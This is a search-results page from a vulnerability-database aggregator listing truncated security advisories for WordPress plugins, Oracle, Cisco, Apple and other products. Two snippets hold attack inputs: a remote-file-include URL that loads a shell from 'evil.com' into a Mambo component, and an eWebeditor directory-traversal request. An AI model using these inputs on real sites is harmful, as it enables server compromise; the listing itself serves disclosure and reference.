Lucene search
K
SecurityvulnsMost viewed

47153 matches found

securityvulns
securityvulns
added 2011/12/04 12:0 a.m.128 views

Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities

a bug in Wordpress flash-album-gallery plugin that allows to us to occur a Cross-Site Scripting on a Remote machin. Islamic Republic Of Iran Security Team http://irist.ir/forum/ Wordpress flash-album-gallery plugin Cross-Site Scripting Vulnerabilities Download......:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2011/10/15 12:0 a.m.128 views

APPLE-SA-2011-10-12-1 iOS 5 Software Update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2011-10-12-1 iOS 5 Software Update iOS 5 Software Update is now available and addresses the following: CalDAV Available for: iOS 3.0 through 4.3.5 for iPhone 3GS and iPhone 4, iOS 3.1 through 4.3.5 for iPod touch 3rd generation and later, iOS...

10CVSS0.73327EPSS
Exploits41
securityvulns
securityvulns
added 2011/06/27 12:0 a.m.128 views

XSS и AoF уязвимости в Drupal

Здравствуйте 3APA3A! Сообщаю вам о найденных мною Cross-Site Scripting и Abuse of Functionality уязвимостях в Drupal. XSS WASC-08: При добавлении или изменении данных в любых внутренних формах добавление/изменение поста и т.д. можно провести persistent XSS атаку. XSS код выполнится при посещении...

5.8AI score
Exploits0
securityvulns
securityvulns
added 2011/06/10 12:0 a.m.128 views

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability

VUPEN Security Research - Oracle Java ICC Profile "ncl2" Tag Integer Overflow Code Execution Vulnerability http://www.vupen.com/english/research.php I. BACKGROUND --------------------- "Java is a programming language and computing platform released by Sun Microsystems now Oracle. It is the...

0.3AI score
Exploits0
securityvulns
securityvulns
added 2011/05/08 12:0 a.m.128 views

HTB22970: Multiple XSS vulnerabilities in PHPDug

Vulnerability ID: HTB22970 Reference: http://www.htbridge.ch/advisory/multiplexssvulnerabilitiesinphpdug.html Product: PHPDug Vendor: Kubelabs.com http://www.kubelabs.com/ Vulnerable Version: 2.0.0 and probably prior versions Vendor Notification: 21 April 2011 Vulnerability Type: XSS Cross Site...

Exploits0
securityvulns
securityvulns
added 2010/10/28 12:0 a.m.128 views

LFI in DZCP

Vulnerability ID: HTB22656 Reference: http://www.htbridge.ch/advisory/lfiindzcp.html Product: DZCP Vendor: dzcp.de http://www.dzcp.de Vulnerable Version: 1.5.4 Vendor Notification: 13 October 2010 Vulnerability Type: Local File Inclusion Status: Fixed by Vendor Risk level: High Credit: High-Tech...

6.5AI score
Exploits0
securityvulns
securityvulns
added 2010/08/05 12:0 a.m.128 views

Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 Cisco Security Advisory: Multiple Vulnerabilities in Cisco ASA 5500 Series Adaptive Security Appliances Advisory ID: cisco-sa-20100804-asa http://www.cisco.com/warp/public/707/cisco-sa-20100804-asa.shtml Revision 1.0 For Public Release 2010 August 04...

7.8CVSS1AI score0.02496EPSS
Exploits0
securityvulns
securityvulns
added 2010/08/03 12:0 a.m.128 views

Microsoft Windows shortcuts code execution

Code execution on shortcut icon displaying...

9.3CVSS2AI score0.91324EPSS
Exploits13References1Affected Software1
securityvulns
securityvulns
added 2010/01/21 12:0 a.m.128 views

eWebeditor Directory Traversal Vulnerability

Securitylab.ir Application Info: Name: eWebeditor Version: all version Vulnerability Info: Type: Directory Traversal Risk: Medium Vulnerability: http://site.com/admin/ewebeditor/admin/upload.asp?id=16&dviewmode=&dir =./.. Discoverd By: Pouya Daneshmand Website: http://securitylab.ir Contacts:...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2009/12/15 12:0 a.m.128 views

Oracle applications multiple security vulnerabilities

Oracle Critical Patch Update fixes 40 of different vulnerabilities in all Oracle applications...

10CVSS2.4AI score0.61309EPSS
Exploits45References24Affected Software7
securityvulns
securityvulns
added 2009/11/11 12:0 a.m.128 views

[MORNINGSTAR-2009-02] Multiple security issues in Cute News and UTF-8 Cute News

MorningStar Security - Advisory http://www.morningstarsecurity.com/ Multiple security issues in Cute News and UTF-8 Cute News 1. Advisory Information ------------------------------------------------------------------------------------------------------------------------ Title: Multiple security...

7AI score
Exploits0
securityvulns
securityvulns
added 2009/01/15 12:0 a.m.128 views

US-CERT Technical Cyber Security Alert TA09-015A -- Oracle Updates for Multiple Vulnerabilities

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA09-015A Oracle Updates for Multiple Vulnerabilities Original release date: January 15, 2009 Last revised: -- Source: US-CERT Systems Affected Oracle Database 11g, version 11.1.0.6 Oracle...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2008/10/03 12:0 a.m.128 views

[USN-649-1] OpenSSH vulnerabilities

=========================================================== Ubuntu Security Notice USN-649-1 October 01, 2008 openssh vulnerabilities CVE-2008-1657, CVE-2008-4109 =========================================================== A security issue affects the following Ubuntu releases: Ubuntu 6.06 LTS...

6.5CVSS0.2AI score0.28601EPSS
Exploits9
securityvulns
securityvulns
added 2008/04/27 12:0 a.m.128 views

Wordpress 2.5 Cookie Integrity Protection Vulnerability

Wordpress 2.5 Cookie Integrity Protection Vulnerability Original release date: 2008-04-25 Last revised: 2008-04-25 Latest version: http://www.cl.cam.ac.uk/users/sjm217/advisories/wordpress-cookie-integrity.txt CVE ID: CVE-2008-1930 Source: Steven J. Murdoch http://www.cl.cam.ac.uk/users/sjm217/...

7.5CVSS0.8AI score0.05001EPSS
Exploits3
securityvulns
securityvulns
added 2007/12/24 12:0 a.m.128 views

[CAID 35970]: CA Products That Embed Ingres Authentication Vulnerability

Title: CAID 35970: CA Products That Embed Ingres Authentication Vulnerability CA Vuln ID CAID: 35970 CA Advisory Date: 2007-12-19 Reported By: Ingres Corporation Impact: Attacker can gain elevated privileges. Summary: A potential vulnerability exists in the Ingres software that is embedded in...

5CVSS6AI score0.01814EPSS
Exploits1
securityvulns
securityvulns
added 2007/12/12 12:0 a.m.128 views

ZDI-07-073: Microsoft Internet Explorer setExpression Vulnerability

ZDI-07-073: Microsoft Internet Explorer setExpression Code Execution Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-07-073.html December 11, 2007 -- CVE ID: CVE-2007-3902 -- Affected Vendor: Microsoft -- Affected Products: Internet Explorer 5.01 SP4 Internet Explorer 6 Internet...

9.3CVSS0.9AI score0.35508EPSS
Exploits1
securityvulns
securityvulns
added 2007/12/07 12:0 a.m.128 views

[security bulletin] HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager (OV NNM) Remote Unauthorized Execution of Arbitrary Code

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 SUPPORT COMMUNICATION - SECURITY BULLETIN Document ID: c01188923 Version: 1 HPSBMA02281 SSRT061261 rev.1 - HP OpenView Network Node Manager OV NNM Remote Unauthorized Execution of Arbitrary Code NOTICE: The information in this Security Bulletin should...

10CVSS0.7AI score0.69613EPSS
Exploits9
securityvulns
securityvulns
added 2007/11/29 12:0 a.m.128 views

Liferay Enterprise Portal multiple XSS

Vendor Site: Liferay.net Version affected: Liferay Enterprise Portal 4.3.1 Demo:http://www.liferay.net/c/portal/login?tabs1=forgot-password Class: Input Validation Error Overview: Liferay fails to sufficiently sanitize user-supplied input data in "email address" text box by pressing the "Send New...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2007/11/12 12:0 a.m.128 views

Web Mayhem: Firefox’s JAR: Protocol issues

Web Mayhem: Firefox’s JAR: Protocol issues published: November 7th, 2007 One of the things that we enjoy the most, here in GNUCITIZEN, is finding issues with features. Unlike bugs, insecure features tend to be more severe and usually last longer due to uneasy and rather long decision making proce...

5.9AI score
Exploits0
securityvulns
securityvulns
added 2007/06/19 12:0 a.m.128 views

fusetalk SQL (autherror.cfm)

Hello everyone, After trying to report bugs to FuseTalk, and seeing them providing patches to customers dropping new fixed .cfm files in a private place reserved to customers without giving proper credits and without reporting them publicly we were following the Full Disclosure Policy v2.0, we...

8.1AI score
Exploits0
securityvulns
securityvulns
added 2007/05/12 12:0 a.m.128 views

Multiple Denial of Service attacks possible for Webspeed OpenEdge

Denial of Service attack against OpenEdge WebSpeed possible through dict.r. 11-5-2007 author: Eelko Neven discovered: 9-5-2007 Because of poor security in dict.r it is possible to put all agents in busy mode. First you have to find the messenger execution url. For example:...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2007/04/11 12:0 a.m.128 views

[Full-disclosure] com_zoom2 Mambo Module Remote File Include Vulnerability

comzoom2 Mambo Module Remote File Include Vulnerability autor:0ozeuso0 website:www.diosdelared.com mail:[email protected] 10/04/07 /components/comzoom2/classes/iptc/EXIFMakernote.php?mosConfigabsolutepath=http:/evil.com/shell.gif?...

0.6AI score
Exploits0
securityvulns
securityvulns
added 2007/01/30 12:0 a.m.128 views

Daily web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

9.3CVSS1.5AI score0.69951EPSS
Exploits12References12Affected Software18
securityvulns
securityvulns
added 2006/11/28 12:0 a.m.128 views

tar archiver directory traversal

Problem with outdated GNUTYPENAMES structure parsing allow to create symbolic links outside target directory...

3.9AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2006/11/09 12:0 a.m.128 views

LetterIt v2 (inc/session.php) Remote File Include Vulnerability

================================================================================== LetterIt RFI ================================================================================== Info:- Scripts: LetterIt download : http://otterware.net/index.php?dl=45 Version : 2 Dork & vuln : download scripts an...

0.7AI score
Exploits0
securityvulns
securityvulns
added 2006/10/13 12:0 a.m.128 views

ExtCalThai_Component <= 0.9.1 Remote File Inclusion

ExtCalThaiComponent = 0.9.1 Remote File Inclusion Download Source : http://mamboxchange.com/frs/download.php/6004/ExtCalThaiComponentv0.9.1.zip Found By : k1tk4t - k1tk4t4tnewhack.org Location : Indonesia -- newhackdotorg file ; adminevents.php extcalendar.p mail.inc.phphp bugs ; at -...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2006/10/11 12:0 a.m.128 views

7 php scripts File Inclusion / Source disclosure Vuln

Title..: 7 php scripts File Inclusion Vuln / Source disclosure Credits: DarkFig Og.link: http://acid-root.new.fr/poc/13061007.txt Using http://www.google.com/codesearch Few examples about what we can do with a code search engine For educational purpose only. You can use regex in your research, th...

7.2AI score
Exploits0
securityvulns
securityvulns
added 2006/09/04 12:0 a.m.128 views

OpenLDAP privilege escalation

User with 'selfwrite' ACL parameter can modify any attributes...

3.8AI score
Exploits0References1Affected Software1
securityvulns
securityvulns
added 2002/11/13 12:0 a.m.128 views

Code Injection in phpBB Advanced Quick Reply Mod

Software: phpBB Advanced Quick Reply Mod I've found a security hole in this sofware Code Injection. You can download this software at http://phpbbhacks.com/viewhack.php?id=586 Hackers can exploit this Mod to inject some shell code to hack your forum, your website or your server local exploit...

Exploits0
securityvulns
securityvulns
added 2001/06/23 12:0 a.m.128 views

Vulnerability in AIX diagrpt

This file contains security alerts published by the IBM Emergency Response Service. These alerts are published at the following URL on the world-wide web: http://www.ers.ibm.com/ In order to keep the size of this file reasonable, it contains only advisories for the current year. You can obtain a...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2000/04/17 12:0 a.m.128 views

StarOffice 5.1

Do you remember recent Microsoft Word and Wordpad vulnerabilities while reading .rtf documents? I realized that Sun StarOffice 5.1 is at least so buggy as M$ products. There are a lot of ways to cause overflow and crash or execution of arbitrary code while viewing documents - starting from html...

0.9AI score
Exploits0
securityvulns
securityvulns
added 2015/10/26 12:0 a.m.127 views

CVE-2015-5603: JIRA and the HipChat For JIRA plugin - Velocity Template Injection

Note: the current version of this advisory can be found at https://confluence.atlassian.com/x/IcBKLg . CVE ID: CVE-2015-5603 Product: JIRA and the HipChat for JIRA plugin. Affected HipChat For JIRA plugin versions: 1.3.2 = version 6.30.0 Affected JIRA product versions: 6.3.5 = version 6.4.11...

6.5CVSS0.4AI score0.59312EPSS
Exploits7
securityvulns
securityvulns
added 2015/05/10 12:0 a.m.127 views

[SYSS-2015-018] BullGuard Premium Protection - Authentication Bypass

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 Advisory ID: SYSS-2015-018 Product: BullGuard Premium Protection Vendor: BullGuard Ltd. Affected Versions: 15.0.297 Tested Versions: 15.0.297 Vulnerability Type: Authentication Bypass Using an Alternate Path or Channel CWE-288 Risk Level: Medium...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2014/12/11 12:0 a.m.127 views

APPLE-SA-2014-12-2-1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA512 APPLE-SA-2014-12-3-1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1 Safari 8.0.1, Safari 7.1.1, and Safari 6.2.1 is now available and addresses the following: WebKit Available for: OS X Mountain Lion v10.8.5, OS X Mavericks v10.9.5, OS X Yosemite...

7.5CVSS0.3AI score0.04583EPSS
Exploits0
securityvulns
securityvulns
added 2014/10/15 12:0 a.m.127 views

[USN-2383-1] wpa_supplicant vulnerability

========================================================================== Ubuntu Security Notice USN-2383-1 October 14, 2014 wpa, wpasupplicant vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its...

6.8CVSS0.3AI score0.04945EPSS
Exploits0
securityvulns
securityvulns
added 2014/09/21 12:0 a.m.127 views

APPLE-SA-2014-09-17-2 Apple TV 7

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 APPLE-SA-2014-09-17-2 Apple TV 7 Apple TV 7 is now available and addresses the following: Apple TV Available for: Apple TV 3rd generation and later Impact: An attacker can obtain WiFi credentials Description: An attacker could have impersonated a WiFi...

9.3CVSS0.3AI score0.49049EPSS
Exploits9
securityvulns
securityvulns
added 2014/06/26 12:0 a.m.127 views

[USN-2253-1] LibreOffice vulnerability

========================================================================== Ubuntu Security Notice USN-2253-1 June 23, 2014 libreoffice vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

10CVSS1AI score0.03922EPSS
Exploits0
securityvulns
securityvulns
added 2014/05/29 12:0 a.m.127 views

[SECURITY] [DSA 2937-1] mod-wsgi security update

-----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 - ------------------------------------------------------------------------- Debian Security Advisory DSA-2937-1 [email protected] http://www.debian.org/security/ Moritz Muehlenhoff May 27, 2014 http://www.debian.org/security/faq -...

6.2CVSS1.7AI score0.08526EPSS
Exploits0
securityvulns
securityvulns
added 2014/05/10 12:0 a.m.127 views

Web applications security vulnerabilities summary (PHP, ASP, JSP, CGI, Perl)

PHP inclusions, SQL injections, directory traversals, crossite scripting, information leaks, etc...

6.8CVSS1.6AI score0.53703EPSS
Exploits16References11Affected Software8
securityvulns
securityvulns
added 2013/12/09 12:0 a.m.127 views

Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities

Document Title: =============== Elite Graphix ElitCMS 1.01 & PRO - Multiple Web Vulnerabilities References Source: ==================== http://www.vulnerability-lab.com/getcontent.php?id=1117 Release Date: ============= 2013-10-18 Vulnerability Laboratory ID VL-ID:...

0.1AI score
Exploits0
securityvulns
securityvulns
added 2013/02/18 12:0 a.m.127 views

[USN-1722-1] jQuery vulnerability

========================================================================== Ubuntu Security Notice USN-1722-1 February 13, 2013 jquery vulnerability ========================================================================== A security issue affects these releases of Ubuntu and its derivatives: -...

4.3CVSS0.2AI score0.19191EPSS
Exploits1
securityvulns
securityvulns
added 2013/01/14 12:0 a.m.127 views

Adobe ColdFusion multiple security vulnerabilities

Authentication bypass, privilege escalation, information leakage...

10CVSS3.1AI score0.93797EPSS
Exploits12Affected Software1
securityvulns
securityvulns
added 2012/09/03 12:0 a.m.127 views

Cross-Site Scripting (XSS) in Jease

Advisory ID: HTB23104 Product: Jease Vendor: jease.org Vulnerable Versions: 2.8 and probably prior Tested Version: 2.8 Vendor Notification: July 25, 2012 Public Disclosure: August 15, 2012 Vulnerability Type: Cross-Site Scripting CWE-79 CVE Reference: CVE-2012-4052 CVSSv2 Base Score: 4.3...

4.3CVSS6.5AI score0.01148EPSS
Exploits0
securityvulns
securityvulns
added 2012/06/03 12:0 a.m.127 views

Acuity CMS 2.6.x <= Path Traversal Arbitrary File Access

OVERVIEW Acuity CMS 2.6.x ASP-based versions are vulnerable to Path Traversal. 2. BACKGROUND Acuity CMS is a powerful but simple, extremely easy to use, low priced, easy to deploy content management system. It is a leader in its price and feature class. 3. VULNERABILITY DESCRIPTION The issue is...

0.8AI score
Exploits0
securityvulns
securityvulns
added 2012/02/14 12:0 a.m.127 views

D-Link DIR-601 TFTP Directory Traversal Vulnerability

Vulnerability title: D-Link DIR-601 TFTP Directory Traversal Vulnerability CVSS Risk Rating: 7.8 High Product: D-Link DIR-601 Wireless N 150 Home Router Application Vendor: D-Link Vendor URL: www.dlink.com Public disclosure date: 1/20/2012 Discovered by: Rob Kraus and Solutionary Engineering...

0.2AI score
Exploits0
securityvulns
securityvulns
added 2012/02/03 12:0 a.m.127 views

[Announce] Apache HTTP Server 2.2.22 Released

Apache HTTP Server 2.2.22 Released The Apache Software Foundation and the Apache HTTP Server Project are pleased to announce the release of version 2.2.22 of the Apache HTTP Server "Apache". This version of Apache is principally a security and bug fix release, including the following significant...

5CVSS0.90734EPSS
Exploits23
securityvulns
securityvulns
added 2012/01/09 12:0 a.m.127 views

Multiple vulnerabilities in ImpressCMS

Vulnerability ID: HTB23064 Reference: https://www.htbridge.ch/advisory/multiplevulnerabilitiesinimpresscms.html Product: ImpressCMS Vendor: The ImpressCMS Project http://www.impresscms.org/ Vulnerable Version: 1.3 Final and probably prior Tested Version: 1.3 Final Vendor Notification: 14 December...

6.7AI score
Exploits0
securityvulns
securityvulns
added 2011/12/19 12:0 a.m.127 views

[RT-SA-2011-005] Owl Intranet Engine: Authentication Bypass

Advisory: Owl Intranet Engine: Authentication Bypass During a penetration test, RedTeam Pentesting discovered an Authentication Bypass vulnerability in the Owl Intranet Engine, which allows unauthenticated users administrative access to the affected systems. Details ======= Product: Owl Intranet...

Exploits0
securityvulns
securityvulns
added 2011/11/27 12:0 a.m.127 views

TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181

TC-SA-2011-02: Multiple web-vulnerabilities in iTop version 1.1.181 Published: 2011/11/16 Version 1.0 Affected products: iTop version 1.1.181, 1.2.0-RC-282 maybe earlier versions as well http://sourceforge.net/projects/itop/ References: CVE-2011-4275 - Multiple web-vulnerabilities in iTop...

4.3CVSS5.5AI score0.01624EPSS
Exploits2
securityvulns
securityvulns
added 2011/10/04 12:0 a.m.127 views

Elastix PBX Extensions Enumeration

Exploit Title: Elastix PBX Extensions Enumeration Date: 1 Oct 2011 Author: Bassem Saleh Contact: Injectoratlivedotcom Software Link: http://www.elastix.org/ Version: 2.X and may be below versions Tested on: 2.0.3 ================================================================ Non privileges user...

1.7AI score
Exploits0
Total number of security vulnerabilities5000